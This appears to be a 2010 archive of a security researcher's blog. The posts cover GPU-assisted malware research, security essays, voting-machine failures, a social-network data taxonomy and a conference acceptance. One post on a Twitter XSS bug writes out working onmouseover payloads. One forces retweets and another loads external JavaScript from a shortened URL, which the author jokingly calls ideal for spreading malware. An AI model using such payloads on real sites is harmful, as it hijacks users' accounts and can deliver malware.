Wednesday, September 29, 2010

GPU Assisted Malware

Hi Folks,
today I suggest this reading: "GPU-Assisted Malware" by Giorgio Vasiliadis, Michalis Polychronakis and Sotiris Ioannidis.



Abstract:

Malware writers constantly seek new methods to obfuscate
their code so as to evade detection by virus scanners.
Two code-armoring techniques that pose significant challenges
to existing malicious-code detection and analysis
systems are unpacking and run-time polymorphism. In this
paper, we demonstrate how malware can increase its robustness
against detection by taking advantage of the ubiquitous
Graphics Processing Unit. We have designed and
implemented unpacking and run-time polymorphism for a
GPU, and tested them using existing graphics hardware. We
also discuss how upcoming GPU features can be utilized to
build even more robust, evasive, and functional malware.


The paper is interesting and easy to read. It's a short paper (6 pages) quick and fun.
I totally suggest to take a break on your daily readings/writings/works to read it.

Monday, September 27, 2010

Security Thoughts

Hi folks,
this morning I wanna share some of my "Security thoughts" on "people and security" that I said during the past conference. I've been recorded and now listening to my words I decided to ''better formalize" them in few sentences.




People are both the problem and the solution, the disease and the cure. It is a dog biting its tail, an inīŦnitive loop which will assure that security problems will never end independently from software engineering or security metrics. Security has been, it is, and it will be a fundamental discipline in the future of every system.

Tuesday, September 21, 2010

Twitter XSS Vulnerability

Hi Folks,
as you probably know I am not used to write about vulnerabilities, but the last Twitter XSS vulnerability comes in the meddle of a vulnerability project where I am working in. The argument was how it is possible having xss vulnerabilities in 2010. My answer has been, and it is: " Because programming is Human". Humans make mistakes ... humans makes bugs that eventually become vulnerabilities. So here it is, last Twitter vulnerability is a perfect and simple XSS injection due to poor input filtering.

This the attack vector:

hppt://twitter.com/RainbowTwtr#@"onmouseover="javascript:alert('Hello World !');"/

When a mouse pointer goes over the tweet a classic "alert" comes out . Here we are, it's enough to browse a twit and you got exploit. Following more examples:

http://twitter.com/RainbowTwtr#@"onmouseover="document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();"font-size:500pt;/

Automatic re-tweet submission.

http://twitter.com/RainbowTwtr#@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')'/

This is pretty nesty, it executes an external javascript. This would be perfect for spreading out malwares :D !

Another interesting demonstration comes from Sophos Labs



Again, none is immune to bugs, please remember the importance of penetration testing, which is the only holistic way to find vulnerabilities.

"The system administrator needs to figure out all the possible bugs to protect his system. The attacker needs to find out only one bug to compromise the entire system"

Friday, September 17, 2010

How to write a Dissertation

This morning students asked me about their Thesis. The question in both cases has been "How can I write my own dissertation ? ".

I started to think about my best answer, but I figured that I do not have a really good answer to such a question. I spent a couple of hours in researching about dissertation tips, how to write thesis, and etcetera but not a very deep incisive and relative comments came out. I also watched some youtube videos on that, in the first one an Indian lady explained some "dissertation tips" during local news, another one explained how the student has to concentrate and how the student need to change for a little period of time his lifestyle. Well ... I really didn't find anything really noteworthy until I found this video :





So my suggestion right now is to listen to this video and keeping as much information you can hold.

Popular Usernames and Password, in a graphic way !

Hi folks,
this morning I found out this interesting page showing up, in a graphic and fun way, the most used Usernames and Passwords.



Check it out !

Wednesday, September 15, 2010

Problems Reported With New Voting Machines


A new voting system unveiled in New York City for the primary election on Tuesday was plagued by problems, with some polling places opening hours late and others verging on chaos as workers coped with malfunctioning machines.



The most funny part:

The poll worker told Mr. Rojas not to worry; every ballot was generating the “system error.”

“Presumably the thing was actually tallied and the system error pertained to something else — that’s what the poll worker was saying,” Mr. Rojas said. “But it didn’t exactly inspire confidence in the whole system.”

Full story.

Monday, September 6, 2010

Never a better introduction.


Today I got the chance to read the Security&Privacy Call for Papers.




I know, usually people reads and quotes notes from scientists or literati and not from CFP, but this time, I believe is different. The few following sentences (extracted from Security&Privacy Call for Papers) well describe the entire security panorama focusing on what security is and what security will be.


Typically, disciplines mature by being “arts” first, “crafts” second, and “sciences” last. An art is considered to be the domain of people with innate abilities and singular talents. Only someone born with a talent can be an artist. A craft is teachable and so requires standardized terminology, proven techniques and an established curriculum. To become a science, a discipline needs quantifiable measures, reproducible experiments, and established laws that make meaningful predictions.
Despite tremendous effort in improving computer security over the past 40 years, and significant progress in our ability to address particular types of vulnerabilities, computer security is, at best, a craft. Although we have developed many good engineering solutions, there is a paucity of scientifi c understanding of the underlying principles for developing secure systems. Unlike the medieval alchemists, we lack well defined goals, quantifi able ways of measuring security properties of a system, and established and repeatable experimental methods

by Davis Evans and Salvatore J. Stolfo

Friday, September 3, 2010

The different type of data in social networks

Today I suggest a smooth and short but pretty strong and important reading from Security&Privacy titled "A Taxonomy of Social Networking Data" by Bruce Schneier. The ClearText is on the last page of S&P which in this issue means on page 88. Bruce described 6 different Data types as:
  • Service Data: is the data you give to a social networking site in order to use it.
  • Disclosed Data: is what you post on your own page.
  • Entrusted Data: is what you post in other people's pages. Once you post such data you loose the control over it.
  • Incidental Data: is what other people post about you. You don't have the control over it and you didn't create it
  • Behavioral Data: is the data the web site collects about your habits by recording what you do and what you like.
  • Derived Data: is the data about you that is derived from all the other data. For example if 80 percent of your friends self-identify as gay, you're likely gay yourself.
Personally I've never heard about such Taxonomy on social media. It seems smart, well structured and really useful while you're going to describe information or data flow on social networks. I wanted to post such "data differentiation" on my blog to remember to cite Bruce's data Taxonomy on my next paper on social networks.
If you get the chance read it.

Thursday, September 2, 2010

IEEE Malware 2010.

With pleasure I announce that my paper on "Multi Stage Delivery Malware" has been accepted to the 5th conference on Malicious and Unwanted Software (Malware 2010).



I Have several readers from France, if you area around Nancy from october 20 to october 21 please let me know, we might have a beer together !